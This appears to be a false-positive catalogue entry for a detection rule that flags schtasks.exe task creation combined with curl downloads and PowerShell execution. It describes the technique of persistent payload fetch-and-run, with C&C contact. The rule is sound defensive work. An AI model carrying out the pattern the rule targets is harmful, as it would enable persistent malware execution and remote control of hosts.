LoFP LoFP / automation scripts combining curl and powershell in controlled environments.

Techniques

Sample rules

Scheduled Task Creation with Curl and PowerShell Execution Combo

Description

Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them. This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host.

Detection logic

condition: all of selection_*
selection_curl:
  CommandLine|contains|all:
  - 'curl '
  - http
  - -o
selection_img:
  CommandLine|contains|windash: ' /create '
  Image|endswith: \schtasks.exe
selection_powershell:
  CommandLine|contains: powershell